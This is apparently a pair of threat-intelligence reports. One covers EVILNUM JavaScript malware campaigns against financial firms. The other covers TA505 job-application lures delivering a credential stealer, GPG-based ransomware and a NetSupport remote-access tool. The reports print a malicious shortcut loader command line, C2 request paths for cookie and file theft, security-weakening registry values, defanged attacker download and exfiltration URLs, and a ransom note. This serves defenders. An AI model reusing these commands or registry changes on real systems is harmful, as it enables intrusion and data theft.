Wednesday, May 6, 2020

Phantom in the Command Shell

Author: Danny Adamitis 

Executive Summary

Prevailion’s Tailored Intelligence Team has detected two new criminal campaigns targeting the global financial industry with the EVILNUM malware, one of which became active on May 3rd 2020. We have dubbed these new operations “Phantom in the [Command] Shell”.

In these engagements, the attack begins when a victim is enticed into following a link to a file hosted on a well known, widely-used cloud provider - unaware that email filters are unlikely to block the domain, and the provider will trust their own links enough that a scan is unlikely. Once engaged, the victim’s device downloads a compressed folder that contains trojanized files. This is a user-initiated infection; meant to appear as a typical business interaction, in this case part of “Know Your Customer” banking procedures. These trojanized files use images of credit cards, driver’s licenses, passports, and utility bills. When the files are opened, the decoy images are displayed to the user, while an agent written in headless Javascript is surreptitiously invoked. Investigation of the agent reveals code comment indicating the two latest iterations are version 3.6 and 4.0, respectively. Both are designed for Windows OS.

The first version of EVILNUM was identified in 2018; the second version was discovered in an unrelated incident response investigation a year later, having infiltrated a FINTECH company. The initial reporting on this malware was the only sign of its presence, as it briefly faded from view.

EVILNUM has surfaced again in the financial sector with a new variant that has evolved with a very effective tool designed to evade both standard network- and host-based detection systems. It uses supplementary logic designed to help it adapt to the local system and alter its actions - and even the choice of C2 - based upon the antivirus products that are detected on the host machine. This agent allows the threat actor to upload files, download files, run commands, steal cookies and access other protected data. It is designed to persist through reboot by adding a registry key, and even removes artifacts of its presence from the host machine. Given the versatility added to this variant, we suspect that this agent has the capacity to load auxiliary payloads onto a host machine.

Technical Details

Introduction

Prevailion has discovered an updated variant of the deceptive EVILNUM agent. This agent was delivered to victims from a URL on a cloud-platform that hosts a zip file. If the link is clicked, the victim downloads a compressed folder riddled with trojanized files that masquerade as PDFs and JPEGs. These files display themselves as seemingly innocuous decoys to the end user, all while quietly running in the background. The first version of EVILNUM malware was observed and reported in 2018. The second version was reported by Palo Alto, targeting a specific financial technology (FinTech) organization. This report covers the latest versions 3.6 and 4.0, how they’re delivered, evasion techniques, and communications channels.

Infection Vector

The infection chain begins when the victim receives a link to a Uniform Resource Locator (URL) hosted on a cloud-based platform, in this case GoogleDrive. This technique is increasingly used to avoid intrusion detection system (IDS) rules, by hosting the malicious file on a 3rd party platform that was likely whitelisted. When that link is clicked and traffic to GoogleDrive is initiated, it begins the process of downloading a compressed folder from that location. 
Phantom in the command shell campaign walk through

Microsoft Link Lures

Prevailion has thus far identified two compressed files harboring the subject malware, although there is evidence to suggest that more zip folders exist. Once decompressed, the folder is found to contain microsoft shortcut (lnk) files that were named to impersonate either jpeg or pdf files. We have categorized these lnk files into two subcategories. The first set of lures uses the basic Know Your Customer (KYC) elements as a ruse, these elements are files that anyone would be asked for when opening a new account with a finance services organization. Some examples include but are not limited to driver’s license, credit cards, credit history documents, and proof of address paperwork. The second subcluster includes a document that appears to impersonate an established financial services organization, and referenced their 2020 GDPR compliance plan. Given the nature of these lures, Prevailion suspects with moderate confidence these efforts were targeted towards select financial institutions rather than wide-scale spamming.

Once decompress the first zip folders contained the following KYC files:
      Driv License front.jpg.lnk
      Driv License back.jpg.lnk
      Credit Card Front.jpg.lnk
      Credit Card Back.jpg.lnk
      Utility Bill.jpg.lnk.

The name on the drivers license corresponds to a real person, who happens to be the CEO of a Bank located in a British territory. The address on the utility bill matches the city of the bank. The second compressed folder was very similar to the first, containing various KYC documents and impersonated a Canadian person who we suspect works for a different financial organization. The last KYC client file that we identified was a Finnish national that we suspect works for a managed cloud services provider. Prevailion was unable to confirm if these documents were authentic, however if forged they closely resemble the genuine article.

The second subcategory contains a file name that references an organization rather than an individual. The document impersonates an investment company located in England.  Like the previously mentioned lnk files, when clicked by the user it launches a script to run in the background of the computer.

As we mentioned, there is added functionality built into this particular agent, and one element is in the display of a decoy file that corresponds to the selected file name. We analysed the properties of the lnk file themselves with lnk parser to search for clues left behind by the actor. However all the lnk files had the same forged metadata; the files were timestomped with a creation date of September 5th, 2018, from a VMWare device based upon the mac address, that had a NetBIOS name of “admin-pc”, suggesting they went to some lengths to obfuscate the metadata related to their activities. The lnk file properties can be found below. 

[Distributed Link Tracker Properties]
Version:                                      0
NetBIOS name:                          admin-pc
Droid volume identifier:              a82e4430-d4a8-417a-b678-88e886bec590
Droid file identifier:                     8cb9d0c4-b0f4-11e8-b065-005056c00008
Birth droid volume identifier:      a82e4430-d4a8-417a-b678-88e886bec590
Birth droid file identifier:             8cb9d0c4-b0f4-11e8-b065-005056c00008
MAC address:                            00:50:56:c0:00:08
UUID timestamp:                       09/05/2018 (10:15:01.429) [UTC]
UUID sequence number:           12389

Loader Functionality

Opening any one of the files, such as “Credit Card Front,” executes a protracted command line argument. The first operation moves the file to the Temp folder and renames it “1.lnk”. Then it proceeds to search for all the files that start with “Cred” in the Temp directory, and search recursively in all directories modified that day. Next it reads the 1.lnk file and redirects the output into a new file named 0.js, It then uses csript to execute that file. The command is as follows:

"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Credit Card front.jpg.lnk " "C:\Users\admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"&type "C:\Users\admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"

Core Agent

This file, 0.js, is the main agent deployed to the victim’s machine. It's written in Phantom and this particular script was designed for Windows OS. One comment in the code suggested that this particular iteration was version 3.6. One of our favorite elements was the use of a one-way communication method to obtain the C2, in order to remain elusive. This agent also built in a function aptly named “DeleteLeftovers,” to remove certain artifacts of the attack. 

Once initiated the agent proceeds to enumerate the infected machine using Windows Management Instrumentation (WMI) to obtain the following information:
      Computername
      Username
      AntiVirus Products

This agent had traditional trojan functionality, that allowed it to perform the following tasks:
      Upload files
      Download files
      Harvest cookies 
      Get Files, from the C2,
      Run arbitrary commands
      Run Windows Script Component (.sct) files
      Call a python 2.7 interpreter through rundll32
      Log any errors that the agent generated

One difference between this variant and previous iterations is the removal of the screenshot functionality. This agent did maintain some original functions such as: bringing files down from the C2, and converting strings of data into bytes and receiving binary data. This suggests the agent was capable of retrieving subsequent payloads, indicating it was likely just a first stage agent.

Retrieval of C2 Address

One of the first things the agent does is ping google to check for an internet connection. If the host machine is connected to the internet, the agent proceeds to kill any instances of Internet Explorer which have the command line parameter matching “-Embedding.” It then uses Internet Explorer to retrieve a remote web page that acts as a one-way communication method, that web page contains a string that identifies the corresponding C2 node.

Like the previous variants of EVILNUM, the actor set up accounts on GitLab and Digital Point, a web forum. The four primary URLs used as drop sites for one-way communications were:
      hxxps://gitlab[.]com/jhondeer123/test/raw/master/README.md
      hxxps://www.digitalpoint[.]com/members/johndeer123.923670/
      hxxps://gitlab[.]com/bliblobla123/testingtesting/-/raw/master/README.md
      hxxps://www.digitalpoint[.]com/members/bliblobla.943007/

The actor likely set up two web pages that corresponded to each campaign for redundancy. The function would periodically check those two web pages every 180000 seconds (50 hours).
Metadata properties of the most recent campaign show that the “bliblobla123” Gitlab account was created on May 3rd, 2020.
Image showing the date when the Gitlab account was created
Image showing the latest C2 embedded in the README.MD file

The “johndeer123” Digital Point account associated with version 3.6, was created on February 21, 2019. One of the differences in the 3.6 and 4.0 variants is that the agent obtains the IP address through a regex search for the string “8346758545”. On the Digital Point web forum instance the observed C2, hxxp://185.62.190[.]89, was stored as a value in the “interest” field.
Image of Johndeer123 Digital Point Profile

If the host is running BitDefender, EVILNUM will reach out to a different URL
hxxps://gitlab.com/jhondeer123/test/raw/master/test.py. The agent then searches for the same string “8346758545”. There is also some fallback functionality to use “long2ip”, the arithmetic based method, implemented in the previous agent. This method takes the number then divides it by 8 and converts it to an IP address.

Command and Control Communications

Once the agent obtains the IP address it will send a GET request to check.php. If the IP address is indeed the correct C2, it returns a message padded with “jifhruhajsdfg444” on each side. In this case it received a padded “success” message:

Wireshark stream of a check interaction from the victim to the C2

Once the agent confirms the correct IP address, it proceeds to send a register request. In this POST it sent the host based enumeration information. Once received the
C2 responded with the agent’s unique identifier that will then get saved at
appDataPath + \\Microsoft\\Credentials\\MediaPlayer\\MediaManager\\id.txt.

Image of the register function with version 3.6 on the left and 4.0 on the right

Based upon code analysis the following HTTP requests and parameters were identified:
      “check.php?id="+id + "&ver="+ ver
      Agent confirms it has the right IP address and sends version number
      “register.php?av=" + av + "&cpu-name=" + cpuName + "&ref="+ REFNAME + "&user=" + userName
      Registers the agent with the C2 and obtain unique identifier
      "view.php", "id=" + id);
      Get commands from the C2
      "cookies.php?id="+id
      Upload harvested cookies to the C2
      "DOWNLOAD_FILE.php".toLowerCase(), "FILE-URL=".toLowerCase() + fileURL
      Download file from C2 then place in tmp and appData folders
      "send.php?id="+id, filePath, "uploaded_file"
      Upload file from infected host to C2
       "upload.php?id="+id, sctFile, "uploaded_file"
      obtain windows script component from from C2, then store it “878478ddd3.TMP”

Persistence

As we described, the agent will persist through a reboot by adding a registry key. This is the same technique that was used in the 2.0 version. One notable feature is that the actor added logic to modify the registry key location, based on the antivirus product that was detected during the enumeration phrase. In the previous version, it would only specify what to do when BitDefender was installed on the host. The new version added functionality to account for Avast.  If either one of those two antivirus specific products were detected it created a registry key at:
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\. 
If there is no antivirus product detected - or something other than BitDefender and Avast - it will create a registry key at:
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows.

Both keys will then run a shortcut file specified at the path:
"C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Credentials\\MediaPlayer\\MediaManager\\Media.lnk".

This shortcut file maps to the media.js file, which contains a copy of the core agent. This set of registry persistence modifications are stored in a file named media.reg.

The second registry modification file, mediaIE.reg, is the same file that has been used since version 1 of EVILNUM. These registry modifications appear to have remained consistent with the newest iteration versions. The modifications are intended to weaken the security of the host machine. For example -  one modification removes the “no protect mode” banner, potentially luring victims into a false sense of security. Another example is the removal of a feature of CCleaner that clears data downloaded from browsers, this is likely meant to ensure downloaded scripts or tools were not removed. The registry keys and modified parameters are listed below.
      HKEY_CURRENT_USER\\Control Panel\\Cursors "AppStarting"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,0
      This decodes to “%.S.y.s.t.e.m.R.o.o.t.%.\.c.u.r.s.o.r.s.\.a.e.r.o._.a.r.r.o.w...c.u.r…”
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main
      "Check_Associations"=no
      "NoProtectedModeBanner"=dword:00000001
      "IE10RunOncePerInstallCompleted"=dword:00000001
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Recovery
      “AutoRecover"=dword:00000002
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PhishingFilter
      EnabledV9"=dword:00000001\r\n\r\n
      HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\BrowserEmulation
      "MSCompatibilityMode"=dword:00000001
      HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ Advanced
      “EnableBalloonTips"=dword:00000000
      HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
      “GlobalUserOffline"=dword:00000000
      HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner
      “BrowserMonitoring"=-"(Mon)3001\"
      HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3
      "2500"=dword:00000003

Conclusion

The Phantom in the Command Shell campaign shows that the threat actors behind the EVILNUM malware family are constantly advancing their techniques as they continue to focus their efforts on the global banking/financial system. The differences between the 3.6 and 4.0 variants appear to be trivial and do not affect functionality.

This group has been targeting the financial sector since 2018 and has achieved success due to their ability to use innovative methods to stay ahead of defensive measures, such as the use of javascript-based agents instead of relying upon more commonly used methods such as executable files. They have continued to evolve this agent by modifying the location of certain files to avoid detection by specific antivirus products and changing communications patterns when certain products are being employed. They created an elaborate command and control retrieval tactic by embedding instructions to use well known platforms, in order to bypass detection. They also configured the agent to use different C2 nodes depending on the security products used by the host machine.

One possible way to protect against this threat, is to disable Microsoft shortcut files on high risk machines that routinely interact with untrusted parties. These high risk machines should also be segmented within the network to impede attackers' ability to spread laterally if they were compromised. We recommend routinely monitoring network logs to check for abnormal connections to IP addresses associated with virtual private servers.

Prevailion has shared our findings with Cyber Threat Alliance members. The CTA uses this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit www.cyberthreatalliance.org.

Indicators of Compromise

GDrive URLs
hxxps://drive[.]google[.]com/uc?auth_user=0&id=1KjJy7FCn-4IN7rsOSwWmSab3xVfY-wNn&export=download
hxxps://docs[.]google[.]com/uc?authuser=0&id=1TROQjDFvR1pw7QckQq1TUVnOYUK6tR6Q&export=download

Zip Files
0f4b51dafe6bd75bce2cfbd1fe16d1af91fd958084e23b526671b4e05423f9ee
97aa67531305da6fb73198fabd05b0592705c427519670a218d68d9def83f764
83f1af96b4a15b3b8ec7490de83555000800779d6456ccd017ba02623704f80c

Microsoft ShortCut (Lnk) Files
9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5
b89cc69c63894c4b263be5a7b7390d3f8500a8ed4834882a7282ebca301e528e
951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b
7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6
4930874f700dd81bff1c0f2ec7a8f55741987e102be8164bdc4aad6ea97062cb 
1bd7598549a967fe6df9c79a173e3f6c6721ec21088e5e1543e2865436cce284 
88537039a4b87ff55ef9a57c21f728ecf90e40e532486913d763e16db04ccac4 
01f1f23649920e30d510f6ae48e370c82dd57ce0817d12f649615d7188c9b0e2 
ca23b0c263652259fc9163d9981033913c9aa3d51a23b1e43f145ca0e0960a30 
Ceb892d73cbfea205239dab384101305a957bfd675486a126787a74068c1ddea
83e5eeb549543e16f98eb26d848194baa8273d5e0408c72222999535f91434fe 
4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade 
Bb8b6c6b9b157b093ba5ff60ec5e9e9268b3efa4ebd46a403859a4d65d21cce7
7d643b369be21f07be4893097084e685f8ea7583d01f19ece6ee3bb86cec062e
69d94240bf1b3dae168934be93d742e2b5e41c2767b4573ccabf3c79c8a017d4
E06ab6b87c4977c4ee30f3925dd935764a0ec0da11458aca4308da61b8027d76
79ddc62bcab8efaef586c7e4202fa6a40a82a37571cbab309812602f7a03162b

Core Agent
Javascript agent version 4.0
75ae7bbdbfccde37a545a6b316e885e9a6d1ecf3c069fa48594a6db6f30c41d0
Javascript agent version 3.6
8c770d3424324030887fd6efcd7b989129f1430b8dafb482372240e93c009a24
951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b
Javascript agent version 3.5
ba4ca5ae0aeb7916a6b08320830bb48c756f7ebaa281431e1311cb66dba3bca0
8100351010C260A7BDC2D283065097140418B5A33CF682F902E793FFAED263D4
Media.reg
9FEE4514F8B3027AD045E67EE8D80317DD2AFBF7A996C97F47C216EAD011B070
MediaIE.reg
6cc5a6ce509a7bbbcaeab1f0635c8b14cbd6a5503cde799de3163fbf70221301

Actor created Folders
appData + \\Microsoft\\Credentials\\MediaPlayer\\MediaManager\\
appData + \\Microsoft\\Credentials\\MediaPlayer\\UtilitiesLog\\

C2 Retrieval URLs
hxxps://gitlab[.]com/bliblobla123/testingtesting/-/raw/master/README.md
hxxps://www.digitalpoint[.]com/members/bliblobla.943007/
hxxps://gitlab[.]com/jhondeer123/test/raw/master/README.md
hxxps://www.digitalpoint[.]com/members/johndeer123.923670/
hxxps://gitlab[.]com/jhondeer123/test/raw/master/test.py

Command and Control Node
hxxp://139.28.37[.]63
hxxp://185.62.190[.]89
hxxp://185.62.190[.]218

MITRE ATT&CK Framework Mapping
Tactic
Technique
Initial Access
Spear Phishing Link (T1192)
Execution
User Execution (T1204)
Persistent
Registry Run Keys / Startup Folder (T1060)
Defensive Evasion
Timestomping (T1099), Indicator Removal from host (T1070),
Modify Registry (T1112), Hidden Window (T1143), rundll32 (T1085),
Credential Access
Steal Web Session Cookie (T1539)
Collection
Data from Local System (T1005),  Data Staged (T1074)
Command & Control
Commonly used port (T1043), Web service (T1102),
Remote File copy (T1105)
Exfiltration
Exfiltration Over Command and Control Channel (T1041)


Thursday, March 19, 2020

The Curious Case of the Criminal Curriculum Vitae

 

Executive Summary

The Tailored Intelligence Team at Prevailion has detected a new campaignat least a facet of which is currently activedubbed The Curious Case of the Criminal Curriculum Vitae.

We associate this campaign with moderate confidence to a known cybercriminal organization TA505, also known as “Evil Corp.” One of the most infamous campaigns associated with this organization was the necurs botnet, which was recently overtaken by Microsoft. This effort undoubtedly hampered TA505’s operations, but in the grand scheme, criminal enterprises like these run multifaceted operations at any given time in order to continuously compromise victims across the globe.

In this newly discovered campaign from TA505, threat actors targeted German companies with trojanized emails disguised as job applicants. While this activity appeared to be geographically based in Germany, these same techniques could easily be applied to any organization.

Once the email attachment was activated, a company's secure credentials and credit card data could be transmitted covertly to the threat actors. In the 2019 iterations of this attack, TA505 used commercial tools to encrypt all the users files, which suggests this recent activity could also lay the groundwork for an infection vector into the company's network to encrypt files.

In a second cluster of activity, TA505 used a more sophisticated approach. They fetched an instance of Netsupport, a commercial remote administration tool, hosted on a user’s Google Drive account. This enabled a host of actions, including remote file transfer, screen captures, and even voice recordings. Since these threat actors are abusing legitimate binaries such as GPG tools and NetSupport, they are unlikely to be removed by traditional antivirus software.   

Based upon the overlap in infrastructure between these two clusters, we associate these clusters of activity to the same threat actor with high confidence. Upon further inspection of the second cluster samples, we were able to correlate it to known TA505 activity based upon the digital signature used to sign the binary.

Technical Details

Cluster 1 Activity


Threat actors have continued to rely upon business email compromise (BEC) to initially infect their victims. This technique is particularly hard to defend against when malicious emails mimic normal business interactions. In this particular case the threat actor impersonated an applicant who sought a job and attached a trojanized version of a Curriculum Vitae (or CV). The sample below was then sent to the human resources department at German-speaking businesses. All observed source email addresses in this case were created through vodafonemail.de.

Image of the malicious email sent to victims in January 2020

The message above roughly translates to:

Dear Sirs and Madames,
I am enclosing my CV in tabular form.
For further questions I am gladly at your disposal.
Friendly greetings

Leon Jager

If the victim clicked on the CV file, lebensaluf_2020_1_7.iso, an embedded Microsoft shortcut (.lnk) file will initiate and run a PowerShell script from the new host. The script begins by reaching out to a threat actor controlled IP address (hxxp://194.36.189[.]215/) to download two files, the first was a copy of rar.exe, and the second was a rar compressed folder named “dmnn.rar”. The first file - rar.exe - is a legitimate binary, used to decompress and compress data files. In this case, it is utilized to decompress the second data file, “dmnn.rar”.

Once decompressed, the dmnn.rar file contained three files named:
      Lebenslauf_2020_1_7.jpeg
      Dmn.bat
      Sqlite3.exe.

The aforementioned lnk file would first display the image file “lebenslauf_2020_1_7.jpeg”, likely in an attempt to avoid suspicion among the victims. 

Image of the Lebenslauf_2020_1_7.jpeg, as it would appear to victim

Next, the Microsoft lnk file will start the “dmn.bat” file using PowerShell. This dmn.bat is rather large, so in order to make it easier to understand, we will describe it in three parts. The first part changed the active console code to “Multilingual” (Latin I) so the code will run regardless of the environment configurations. This first segment enumerated the host machine:
      Determine all the programs names installed on the machine,
      Version of the programs,
      Date the programs were installed,
      Determine the computer’s name,
      Determine the computer’s domain.

The script then proceeds to generate a string of eight random characters, likely as a unique identifier for each workstation. If the computer name and domain are not the same, it sends that information along with the unique identifier to the threat actor controlled C2 located at URI hxxp://194.36.189[.]215/firstga990.php 

The second part of the script attempted to gather saved credentials, cookies, and credit cards. Specifically, it looks for the following information:
      use the sqlite3.exe to obtain saved cookies, login data, and web data (such as credit card numbers) from Google Chrome,
      It would attempt to grab saved login passwords as well as cookies from ThunderBird, Mozilla, and Edge applications
      Kill all task hosts and dll hosts processes
      Enumerate and harvest outlook credentials.

 
Image showing the process obtained saved information from Chrome browser

Once all the saved credentials were obtained, it wrote the output into the “safsff3f” directory. That directory is then compressed using rar and renamed as the aforementioned unique identifier. The newly compressed file was then sent back to the threat actor controlled C2, specifically the URI “hxxp://194.36.189[.]215/ris.php”

Lastly it created a scheduled task with the same name as the unique identifier. The task runs every minute, transmitting the unique identifier back to the C2 - likely as a heartbeat beacon. Finally, the bat file will delete all the files that were downloaded, created, and modified from the host machine. While this walkthrough is for the campaign that occurred on January 17th, 2020, we have observed these same techniques being used back until July of 2019.

GPG Ransomware from June 2019 Strain 

Once we analyzed the aforementioned samples, we discovered a similar rar file from June of 2019 that included a ransomware component. Like the previous operations, this one began with a file named “Lebenslauf_2019_6_6.iso” which contained an embedded Microsoft lnk file from June 2019. This Microsoft lnk file is almost identical to the one from January 2020.

Images showing the lexicon similarities between the iso files

The Microsoft link file again obtains both a rar executable and a rar compressed folder. Once unpacked, this folder contained the following files:
      Brg.brg, which contains a public 2048 bit RSA key
      Brk.bat, a batch script to encrypted stored files
      Sh.vbs, visual basic script to delete all shadow copies as system
      Lebensaluaf_2019_6_6, an image file,
      Gpg.exe, GPG executable
      Gpgconf.exe, support file for GPG tools
      Libassuan-0.dll, support file for GPG tools         
      Libgcrypt-20.dll, support file for GPG tools
      Libgpg-error-0.dll, support file for GPG tools   
      Libnpth-0.dll, support file for GPG tools    
      Libsqlite3-0.dll, support file for GPG tools  
      Zlib1.dll, support file for GPG tools

The main difference between this example and 2019 strain, was the inclusion of the GPG suite files. The batch file would encrypt all the drives on the local machine using the public GPG key “brg.brg”. Next it will compress the files and send some host based data to the email address [email protected]

Image of the malicious batch file

It would then display the following message to the victim, please note this is a verbatim copy of the message:
 "ATTENTION!"
"All important files and information on this comuter (documents, databases, etc.) will be decrypted using a RSA cryptographic algorithm"
"Without special software decoding a single file with the help of the most powerful computers will take about a 20 years."
"contact an expert  on e-mail: [email protected] or [email protected]"

The visual basic script proceeds to delete the shadow copy of the files as “system,” using Windows Management Instrumentation. The files that were in the compressed folder are deleted, and following that a web request is sent to the URI "hxxp://185.106.120[.]31/ok"

During our investigation, we were able to identify another folder with the ransomware strain, containing file names that indicate it was from May of 2019. This folder once again contained GPG keys and a public key that is used to encrypt all the local files. There were only a few small differences - the first is that the encrypting functions were written in visual basic instead of as a batch file. In this sample, the batch file simply contained a short script to delete all the downloaded files. Despite the damages this compressed folder could cause, we noticed it had a relatively low detection rate.

Virustotal detection rate for compressed tog.rar file, containing GPG ransomware script

The second difference were the email addresses used to contact the threat actor: blklock{at}airmail.cc and hopionion123{at}protonmail.com. Anecdotally, we found a post on an Eset forum where someone claimed to be victimized by this threat actor. We correlated these events based upon the same email address being found in the ransomware message that stated they should contact blklock{at}airmail.cc - from a user in Germany. While this first cluster of activity appeared to be geographically based in Germany, these same techniques could easily be applied to any organization looking to recruit new applicants.

Cluster 2 - “REKT” and NetSupport Remote Admin Tool

Overlap between with a Remote Administration Tool 

Once we identified the C2 nodes that were used to host the malicious compressed rar files, we noticed that they also hosted executable files. In the recent campaign of February 2020, the threat actor used the C2 node, 194.36.189[.]215, to host both the malicious rar folder and the executable, named rrr.zzz, on the same day according to Virustotal.

Virustotal screenshot with both the CV rar and the new sample being hosted on the same date

Upon further examination of the C2 used in the January campaign, 185.244.150[.]143, also hosted a variant of the same executable, “fnb.111”. Based upon the infrastructure overlap in two separate cases, we assess with high confidence that the same threat actors who were responsible for the “Curriculum Vitae'' attack were associated with this new agent.

The Rekt Loader 

Luckily one of the files, rrr.zzz, still had the debug strings which aided us in our efforts to better understand the agent. For example, we were able to extract the following PDB string:
            "C:\\Users\\Андрей\\Desktop\\readme\\proj\\tst - копия\\Debug\\rekt.pdb"

This led us to believe that the threat actors named this particular loader “rekt”. Not to be confused with the ransomware REKTlocker. The sample was written in c and c plus plus in visual studio 2017. The primary purpose of this loader was to download additional payloads. The samples contacted three unique URLs, all of which were hosted on Google Drive. It used a hard-coded user agent string in order to contact Gdrive. 
            Mozilla / 5.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)

2nd Stage - NetSupport

Once the rekt loader contacted the three Google Drive URLs, it downloads the following files:
      7zip.exe, a benign program used to compressed/decompress files
      A batch file
      A password-protected 7zip file

The rekt loader would then run the batch file; this batch file utilized the 7zip executable to decompress the folder and entered the requisite password. Once decompressed the files were redirected to the directory “%APPDATA%”. Afterward, it would add a “Run” registry key for persistence to start “host.exe”. The registry key modified was HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
Next, it would start the host.exe file that was downloaded and following completion, kill the rundll32.exe files, change the %TEMP% directory and finally delete the batch file, and the 7zip executable.

Image of the batch file hosted on Google Drive

The host.exe file was identified as NetSupport; Netsupport is a commercially available software program that offers remote desktop software to customers. Since this is a commercially available product, it was a signed windows binary, making it unlikely to be flagged by antivirus products. While this tool, and those like it, were intended to be used as authorized administratives and information technology staff they can also be abused by nefarious actors. Once this tool is deployed it provides the following capabilities:
      remotely transferring files
      geo-location of the infected machine
      Ability to screenshots,
      Remotely turn on the microphone to capture audio.

The only file that appeared to be modified by the threat actor was client32.ini, where the threat actors were able to enter their own gateway address as hxxp://23.227.207[.]138:12233. 

Correlations to Prior Reporting

Once we identified the Rekt loader, we began to look for other variants of this sample. We identified an older variant from 2019, although we highly suspect there are likely additional samples. The sample from April 2019 was hosted on a compromised domain, hxxp://juristlex[.]com/photo/photo88326635[.]scr. Our evaluation showed that it appeared to be very similar to the agent from 2020.

One big difference was that this particular sample was signed with a digital signature from “Allo’ Ltd”. The company named “Allo’ Ltd” appeared to be a convenience store, or bodega, in the United Kingdom that closed in 2018. Searching on the properties of of that digital signature, we identified two “flawwed ammy” trojans. The digital signature used to sign two “flawwed ammy” trojans was referenced in a report by the South Korean FSI-Cert report, released earlier this year on TA505 activity. Both the flawwed ammy signature and the one used on the 2019 rekt sample referenced the same company, same address and expired on the same day at the same time. All three hashes and the digital signature serial number can be found below in the IOC section. We assess it was highly unlikely that another actor would impersonate the same organization to obtain a digital signatures for binaries, therefore we correlate the Rekt agent and the C2 nodes used to host them to TA505 with moderate confidence.

Digital Signature for the 2019 Rekt sample on the left, Flawwed Ammy sample on the right

Operation overview showing overlap between campaigns

When we analyzed the TTPs associated with this second cluster of activity, we observed similarities to reports by both Palo Alto and FireEye. The strongest correlation was with the Palo Alto report, where they observed the NetSupport RAT being deployed, and then observed it communicating with a hard-coded IP address ending in “/fakeurl.hml”. The one difference they observed was NetSupport being downloaded by a PowerSploit module, whereas we observed it being downloaded from the rekt loader. There were also some similarities between this campaign and a FireEye report, where they observed a threat actor using a benign version of 7zip, and a batch file that contained a password to decompress a folder containing NetSupport. In the FireEye report, the victims were compromised by visiting water holed websites.

Conclusion

The threat actor group known as TA505 has been active since at least 2017, and has continued to be prolific through the first quarter of 2020. This entity has achieved a high level of success due to their ability to abuse legitimate binaries for nefarious purposes. Two examples of this are the use of GPG tools to encrypt all the files on a machine; and employing a legitimate remote systems administration tool that already has all the functionality they need, while reducing the risk of being detected. Since the binary was signed, even if it was detected by an anti-virus engine, it has great potential to mistakenly be ignored as software that was intentelly installed by the network administrator.

In order to protect against TA505 and BEC in general, we recommend using an email security solution. End users should regularly update their antivirus product of choice, particularly on high-risk users who are opening files from untrusted sources. In order to protect a corporate environment against ransomware attacks, the corporate network should be segmented to impede attackers' ability to spread laterally once they gain access. Strong passwords should be used for all corporate accounts, along with a password manager. For guidance on how to create strong passwords, click here.    

Prevailion has shared our findings, including file samples and indicators of compromise, in this report with Cyber Threat Alliance members. The CTA uses this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit www.cyberthreatalliance.org.

Indicators of Compromise 

Cluster 1 Activity - 2020 Strain
Campaign 0
Lebenslauf.eml:c15509032984f5716c86318f6fe8947bb040a7a3ff3b0996b4be2a763a1cb5aa
Lebenslauf_2020_1_7.iso:
eafe495e925747358f0d9d2081c492e70d6e427763e51a9835c8e8bb8b976ff1
Lebenslauf_2020_1_7.jpeg.lnk:
e3cd6f18cd180ec891ad0d93a7ee957fdf2ce83287abd1d0dfd1783a9c54a3fd
URL:hxxp://194.36.189[.]215/rar.exe
URL:hxxp://194.36.189[.]215/dmnn.rar
Rar.exe: 5a0898b193b27b8b962c9519d756f0631b62a6a0658a676ffc84744edbff0e10
Dmnn.rar:3383c2133f6a11f5a7d52499f2737291466be7400fd108eaf46215eb74b77e2b
Lebenslauf_2020_1_7.jpeg:
dad4776d9458167fb081256b90273df5ac24ff6a99fb51718b08e6faba1b0691
Sqlite3.exe:2e162d331c2475e0ba39cea969e0473896d3ff5e88cc92605ff2e24da3920768
Dmn.bat:fdfb021dd60ef9fba36e82c4d4b1f4ca255ce93f9d11cd13765c3829d4b6f833
hxxp://194.36.189[.]215/firstga990.php 
hxxp://194.36.189[.]215/ris.php

Campaign 1
lebenslauf_2020_1_7.iso:
113258dc930029951d6a006d247caba5630643f3bc1e3e37e10edf36e192565f
lnk:b6d8bea34d2973708fcf48d9af375cc7da30e46fb0028568ea997b2a6d80ae98
hxxp://185.244.150[.]143/rar.exe
hxxp://185.244.150[.]143/dmnn.rar
Dmnn.rar:bc7fc774d0ad59744719d0032812056674ebfded7263c46ab417bd9669538861
URI:hxxp://185.244.150[.]143/firstga990.php

Campaign 2
Eml:e7b38d68426a83681caf08076527c5e692551611c512de200318ae227b107a2f
Lebenslauf_2020_1_7.iso:
19226ce95e9767daec63a903167532cdaae9e02495c003ade68c702b776c1288
